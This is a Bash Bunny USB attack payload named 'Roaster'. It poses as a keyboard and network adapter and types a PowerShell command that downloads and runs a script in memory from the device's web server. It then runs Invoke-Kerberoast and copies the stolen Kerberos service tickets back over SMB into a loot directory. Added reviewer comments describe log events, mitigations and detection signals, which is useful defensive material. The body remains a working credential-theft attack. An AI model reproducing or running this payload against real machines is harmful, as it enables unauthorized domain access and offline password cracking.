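#!/bin/bash
#
# Title: Roaster
# Author: golem445
# Version: 1.0
# Attack Modes: RNDIS_ETHERNET, HID
# Dependencies: impacket, gohttp
# Runtime: ~10 seconds
# Description:
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to import Invoke-Kerberoast into memory via
# Bash Bunny web server and execute the attack. Results are
# exported to the loot directory via SMB.
#
# LEDS:
# Magenta: Setup
# Yellow Blink: Attacking
# White Blink: Clean up
# Green: Attack Finished
#
# Reviewer notes (defensive view):
# - LED, REQUIRETOOL, GET, ATTACKMODE and RUN are Bash Bunny framework
#   commands, not standard shell; the script only runs on that device.
# - The device enumerates as a USB network adapter and a keyboard at the
#   same time. Endpoint policy that restricts newly attached USB network
#   and HID devices is the preventive control for this class of payload.
# - The host-side stage is a PowerShell one-liner that pulls a script over
#   plain HTTP from 172.16.64.1 and runs it in memory. With PowerShell
#   script block logging (event 4104) and process command-line auditing
#   enabled, that invocation is recorded on the host.
# - Kerberoasting requests service tickets for SPN-bearing accounts so
#   they can be attacked offline. Domain controllers log those requests
#   as event 4769; long random service-account passwords, group managed
#   service accounts and AES-only ticket encryption are the usual
#   mitigations.
# - Results leave the host over SMB to the device, so outbound SMB from a
#   workstation to a non-corporate address is a further detection signal.

### Prep for attack ###
LED SETUP
REQUIRETOOL impacket gohttp
GET SWITCH_POSITION

# Temporary loot directory
mkdir -p /loot/smb/

# Permanent loot directory
mkdir -p /root/udisk/loot/roaster_exfil/

# Set interfaces
ATTACKMODE RNDIS_ETHERNET HID

# Start web server
# gohttp serves the current working directory, so stop if the payload
# directory cannot be entered; otherwise an unintended directory of the
# device would be published on port 80 to the attached host.
payload_dir="/root/udisk/payloads/${SWITCH_POSITION}"
if ! cd "$payload_dir"; then
  LED FAIL
  exit 1
fi
gohttp -p 80 &

# Start SMB Server
# Share "s" is backed by the temporary loot directory.
python /tools/impacket/examples/smbserver.py s /loot/smb &

### Start attack ###
LED ATTACK
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"

# Wait until files are done copying.
# The marker file is presumably written by s.ps1 (not shown here) once
# its upload finishes - confirm against that script.
# NOTE(review): there is no timeout, so this blocks indefinitely if the
# marker never appears.
LED STAGE2
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

### Cleanup ###
LED CLEANUP

# Delete Exfil file
rm -- /loot/smb/EXFILTRATION_COMPLETE

# Move Kerberos SPNS to permanent loot directory
mv -- /loot/smb/* /root/udisk/loot/roaster_exfil/

# Clean up temporary loot directory
# NOTE(review): this runs even if the move above failed.
rm -rf -- /loot/smb/*

# Sync file system
sync

# Complete
# NOTE(review): the background gohttp and smbserver.py processes are not
# stopped by this script.
LED FINISH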